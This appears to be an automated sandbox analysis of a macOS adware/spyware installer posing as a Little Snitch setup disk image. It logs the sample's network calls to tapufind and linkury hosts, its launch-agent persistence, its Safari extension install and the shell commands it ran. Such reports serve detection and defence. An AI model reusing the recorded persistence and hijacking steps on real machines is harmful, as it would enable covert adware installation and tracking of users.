Source: global trafficHTTP traffic detected: GET /mmecw/qqvdwx?cid=3gggkfl1b0pp5pt5sadh&f=setup&pvhid=36264242-8135-4590-9915-e3e977081c0c HTTP/1.1Connection: keep-aliveHost: www.rached.space
Source: global trafficHTTP traffic detected: GET /download/downloaddm?com=df68d247-e9f2-42fa-b681-f63a4bb6ab50&=&f=setup&cifd=3gggkfl1b0pp5pt5sadh&sidw=df68d247-e9f2-42fa-b681-f63a4bb6ab50 HTTP/1.1Connection: keep-aliveHost: www.oplurb.space
Source: global trafficHTTP traffic detected: GET /MaxMind.asmx/GetGeoInfo HTTP/1.1Host: cloud-search.linkury.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: macsearch/1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /StateStatisticsService.svc/V1/JSON/GetDistributorIdFromNameHttpGet?distributorName=mcwnet HTTP/1.1Host: svc-stats.linkury.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: macsearch/1 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /tpmac.html?_publisher=mcwnet&_barcodeid=52413004&_deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c&_installDate=14-02-2019 HTTP/1.1Host: search.tapufind.comUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /MaxMind.asmx/GetGeoInfo HTTP/1.1Host: madmax.macapproduct.comAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: tapufind (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /tpmac.html?q= HTTP/1.1Host: search.tapufind.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Upgrade-Insecure-Requests: 1Cookie: _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4enlF-6wdoQlc-OolePTLz-gpC4fFENArXjXOKtxlSolwZzKvztNbvkqXoIQzwLhtCZ01IeMYZE8p3MokiKZQ25VtmqQ7xMDUGu5xssIVE-2pe89knPY0TNfSSALHPXIbkjNFqbePLX5bkr7M5Cz6jzaQ7It7cho,User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: feed.tapufind.comUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /?publisher=tapufindsf&feedid=infospace&dpid=yhs&hsimp=yhs-newtab&userid=syn_d955cead-824c-4550-9e89-02e36ed3c263&co=CH&type=YHS_TAPHP_100 HTTP/1.1Host: search.tapufind.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Upgrade-Insecure-Requests: 1Cookie: _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnet; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4enlF-6wdoQlc-OolePTLz-gpC4fFENArXjXOKtxlSolwZzKvztNbvkqXoIQzwLhtCZ01IeMYZE8p3MokiKZQ25VtmqQ7xMDUGu5xssIVE-2pe89knPY0TNfSSALHPXIbkjNFqbePLX5bkr7M5Cz6jzaQ7It7cho,User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /?q= HTTP/1.1Host: search.tapufind.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Upgrade-Insecure-Requests: 1Cookie: co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnetUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /js/classList.js?v=6 HTTP/1.1Host: search.tapufind.comAccept: */*Connection: keep-aliveCookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnetUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /Pixel.aspx?name=TapuFind&type=extensioninstalled&browser=false&entity=31&barcode=52413004&userid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c&data1=true HTTP/1.1Host: feed.tapufind.comAccept: */*Cookie: SmFeedSearchParams=useragentbrowser=safari&u_ip=185.189.150.72&$host=feed.tapufind.com&userid=syn_d955cead-824c-4550-9e89-02e36ed3c263&co=CH; feeduid=syn_d955cead-824c-4550-9e89-02e36ed3c263User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /js/auto-complete.js?v=6 HTTP/1.1Host: search.tapufind.comAccept: */*Connection: keep-aliveCookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnetUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /js/preloadjs-0.6.2.min.js?v=6 HTTP/1.1Host: search.tapufind.comAccept: */*Connection: keep-aliveCookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnetUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /js/main.js?v=6 HTTP/1.1Host: search.tapufind.comAccept: */*Connection: keep-aliveCookie: ASP.NET_SessionId=3pvsaqlbktbmlre22qymqs2s; paramless_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4MazA; sp_ref=; co=CH; dpid=yhs; feedid=infospace; hsimp=yhs-newtab; issubmit=true; param_url=gKW_Gr7MM17t7q271p8ZSeiRhWQaK9t3OGj4Ma23JRq5roLi28zEds39kAibte8Rm0KlQgUHBFN5RU4oT_qrHlUdboQ6bQsk8XOpI0E-9gT1HZjFcXQc9cx-qiPebfuJKpz2rPjuI6csEMA_bzdnwjmMLpEII_JtAD9H1XZ-H8BAlNHZXQS3wvIqZ92YrUcE-d0YDoVyV4INtuxhCHfqzvdsXtA,; publisher=tapufindsf; type=YHS_TAPHP_100; userid=syn_d955cead-824c-4550-9e89-02e36ed3c263; _barcodeid=52413004; _deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c; _installDate=14-02-2019; _publisher=mcwnetUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /tag?zone_id=58942&size=300x250&pub_keyword=&context=syn_d955cead-824c-4550-9e89-02e36ed3c263&rnd=75329692 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /imp?i=a3Ul5KJ911U_0 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /js/ld/publishertag.js HTTP/1.1Host: static.criteo.netConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /delivery/ajs.php?ptv=63&zoneid=296021&cb=21558021369&nodis=1&charset=UTF-8&dc=3&atfr=1&loc=http%3A%2F%2Fsearch.tapufind.com%2F%3Fq%3D HTTP/1.1Host: cas.criteo.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /tag?zone_id=11521&size=300x250&j=pu%3Dsearch.tapufind.com%26if%3D0%26rn%3D60494450 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /delivery/lg.php?cppv=1&cpp=vjv2WXxBdUJ1d0t1Ty9lVTQxZXFNWUlPQ2FMMllLc3FVM2U0TE1WRXdoa2loWThvbm1KT2tXaStHYXNNUEVkNyt1MWdTcVZGa1U4NHFCWk0xWlJ6a1ByQVRSUURhOHVNaDcvZ0plZ0dSUWlFazlzMVhwc1UwNk9KeGY1WThFSGxjR0E0UlhqRTNtU2luMWg4MFR5cGo5TVowdDI1UXk5dEN2MDdKaXpPN0RyYnIyQStsRzEreXlwNDEwRXBVS3RRVHFqZTh0dG4zS3hpYmJHc0xSSzY1RnJGNURnPT18 HTTP/1.1Host: cat.fr.eu.criteo.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /imp?i=6cy8GQVa6Zc_0 HTTP/1.1Host: display.online-adnetwork.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7Accept-Language: en-usReferer: http://search.tapufind.com/?q=Accept-Encoding: gzip, deflate
Source: global trafficHTTP traffic detected: GET /MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISA05%2FLr%2B8wuv7zvqr86TvKiUl HTTP/1.1Host: ocsp.int-x3.letsencrypt.orgConnection: closeUser-Agent: trustd (unknown version) CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: install.osxappdownload.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /loadPE/getOffers.php HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 809Expect: 100-continueConnection: keep-aliveHost: 34.225.153.59:10000
Urls found in memory or binary dataShow sources
Source: setup.dmgString found in binary or memory: http://bugzilla.xamarin.com
Source: setup.dmgString found in binary or memory: http://bugzilla.xamarin.com%
Source: setup.dmgString found in binary or memory: http://bugzilla.xamarin.com%s//%s%s/%sXamarin.Mac:
Source: setup.dmgString found in binary or memory: http://crl.apple.com/root.crl0
Source: setup.dmgString found in binary or memory: http://docs.xamarin.com/ios/about/limitations
Source: setup.dmgString found in binary or memory: http://ios.xamarin.com/Documentation/Limitations#Reverse_Callbacks
Source: setup.dmgString found in binary or memory: http://ios.xamarin.com/Documentation/Limitations#Reverse_Callbackssig-
Source: setup.dmgString found in binary or memory: http://ocsp.apple.com/ocsp03-wwdr090
Source: setup.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: setup.dmgString found in binary or memory: http://www.apple.com/certificateauthority0
Source: setup.dmgString found in binary or memory: http://www.gexf.net/1.2draft
Source: setup.dmgString found in binary or memory: http://www.go-mono.com/mono-downloads/download.html
Source: setup.dmgString found in binary or memory: http://www.mono-project.com/Diagnostic:Delegate
Source: setup.dmgString found in binary or memory: http://www.mono-project.com/download.
Source: setup.dmgString found in binary or memory: https://www.apple.com/appleca/0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49348
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49347
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49346
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49344
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49342
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49341
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49340
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49339 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49344 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49342 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49339
Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49341 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49349

System Summary:

barindex
Sample file is different than original file name gathered from version infoShow sources
Source: setup.dmgBinary or memory string: originalfilename vs setup.dmg
Source: setup.dmgBinary or memory string: \StringFileInfo\%02X%02X%02X%02X\OriginalFilename vs setup.dmg
Source: setup.dmgBinary or memory string: UnhandledExceptionEventArgsSTAThreadAttributeargsarg->vtable->klass == mono_defaults.int_classtype 0x%x not handled in mono_runtime_invoke_arraySystem.Runtime.Remoting.ActivationActivationServicesToStringfilenameThis system does not support EnumProcessesProcessModulebaseaddrentryaddrmemory_sizemodulenameversion_infoFileVersionInfo[In Memory] %sfilemajorpartfileminorpartfilebuildpartfileprivatepartproductmajorpartproductminorpartproductbuildpartproductprivatepartisdebugisprereleaseispatchedisprivatebuildisspecialbuild\VarFileInfo\Translationlanguagecomments\StringFileInfo\%02X%02X%02X%02X\Commentscompanyname\StringFileInfo\%02X%02X%02X%02X\CompanyNamefiledescription\StringFileInfo\%02X%02X%02X%02X\FileDescriptionfileversion\StringFileInfo\%02X%02X%02X%02X\FileVersioninternalname\StringFileInfo\%02X%02X%02X%02X\InternalNamelegalcopyright\StringFileInfo\%02X%02X%02X%02X\LegalCopyrightlegaltrademarks\StringFileInfo\%02X%02X%02X%02X\LegalTrademarksoriginalfilename\StringFileInfo\%02X%02X%02X%02X\OriginalFilenamepri
Classification labelShow sources
Source: classification engineClassification label: mal88.troj.spyw.evad.macDMG@0/49@46/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit

Persistence and Installation Behavior:

barindex
Attaches disk images with shell command 'hdiutil'Show sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Hdiutil command executed: /usr/bin/hdiutil attach /Users/henry/Library/X2441139MAC/Temp/mcwnet -nobrowseJump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Hdiutil command executed: /usr/bin/hdiutil attach /Users/henry/Library/X2441139MAC/Temp/track_mac.php%3Fcc={GEO}%26clickId={clickId}%26affId={affId}%26transId=3gggkfl1b0pp5pt5sadh -nobrowseJump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Hdiutil command executed: /usr/bin/hdiutil attach /Users/henry/Library/X2441139MAC/Temp/chs -nobrowseJump to behavior
Installs Safari extensionsShow sources
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)Safari extension file moved: /private/tmp/SafariSetter.safariextz -> /Users/henry/Library/Safari/Extensions/TapuFind.safariextzJump to behavior
Writes Mach-O files to untypical directoriesShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/Agent/tapufindJump to dropped file
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/ditto (PID: 673)Permissions modified for written 64-bit Mach-O /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5Ob: bits: - usr: - grp: - all: rwxJump to dropped file
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/Agent/tapufind: bits: - usr: rwx grp: rwx all: rwxJump to dropped file
Copies directory hierarchies, creates and/or extracts archives with shell command 'ditto'Show sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Ditto command executed: /usr/bin/ditto /Volumes/macsearch/ /tmp/Jump to behavior
Creates application bundlesShow sources
Source: /usr/bin/ditto (PID: 673)Bundle Info.plist file moved: /private/tmp/macsearch.app/Contents/.BC.T_8EnSAw -> /private/tmp/macsearch.app/Contents/Info.plistJump to behavior
Creates hidden files, links and/or directoriesShow sources
Source: /usr/bin/ditto (PID: 673)Hidden file created: /private/tmp/macsearch.app/Contents/.BC.T_8EnSAwJump to behavior
Source: /usr/bin/ditto (PID: 673)Hidden file created: /private/tmp/macsearch.app/Contents/MacOS/.BC.T_5fp5ObJump to behavior
Source: /usr/bin/ditto (PID: 673)Hidden file created: /private/tmp/macsearch.app/Contents/.BC.T_6vxTVoJump to behavior
Source: /usr/bin/ditto (PID: 673)Hidden file created: /private/tmp/macsearch.app/Contents/Resources/Base.lproj/.BC.T_g27T4pJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /tmp/.dat.nosync02b9.9vvQheJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /tmp/tapufind/.dat.nosync02b9.o9GXrLJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /tmp/tapufind/.dat.nosync02b9.IwDBz8Jump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.Xbmr58Jump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /tmp/tapufind/.dat.nosync02b9.raddFFJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /tmp/tapufind/.dat.nosync02b9.sOJfNrJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02b9.u0j70jJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /tmp/tapufind/.dat.nosync02b9.DAOwrTJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Hidden file created: /Users/Shared/.dat.nosync02b9.Mi0YZKJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)Hidden file created: /Users/henry/Library/Safari/Favicon Cache/favicons/.dat.nosync02be.xXJadSJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 702)Hidden file created: /Users/henry/Library/Safari/Extensions/.dat.nosync02be.9uS08ZJump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)Hidden file created: /Users/Shared/.dat.nosync02c9.zBHRPMJump to behavior
Source: /Users/henry/Library/Application Support/Agent/tapufind (PID: 713)Hidden file created: /Users/henry/Library/Application Support/Agent/.dat.nosync02c9.0oMHxIJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Shell command executed: sh -c open -a safari 'http://search.tapufind.com/tpmac.html?_publisher=mcwnet&_barcodeid=52413004&_deviceid=d7fc6553-0faa-5bb8-86d8-c132df7dc85c&_installDate=14-02-2019'Jump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Shell command executed: sh -c open -a safari /tmp/SafariSetter.safariextzJump to behavior
Explicitly lists launch services possibly for searchingShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon listed: /bin/launchctl listJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon listed: /bin/launchctl listJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon listed: /bin/launchctl listJump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon loaded: /bin/launchctl load /Users/henry/Library/LaunchAgents/tapufind.plistJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launch agent/daemon loaded: /bin/launchctl load /Users/henry/Library/LaunchAgents/tapufind.plistJump to behavior
Opens applications that may be created onesShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Application opened: /usr/bin/open /Volumes/InstallMe/Installer.appJump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Application opened: /usr/bin/open /Volumes/Volumes/SetupInstaller/'Click\ Here\ To\ Install.app'Jump to behavior
Opens the Safari browser appShow sources
Source: /usr/libexec/xpcproxy (PID: 702)Safari app opened: /Applications/Safari.app/Contents/MacOS/SafariJump to behavior
Reads launchservices plist filesShow sources
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Volumes/Little_Snitch_583_MAC_OS_X/Installer.app/Contents/MacOS/Installer (PID: 653)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/system_profiler (PID: 659)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/sbin/system_profiler (PID: 661)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 664)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 681)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 692)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /tmp/macsearch.app/Contents/MacOS/macsearch (PID: 697)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 701)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 710)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
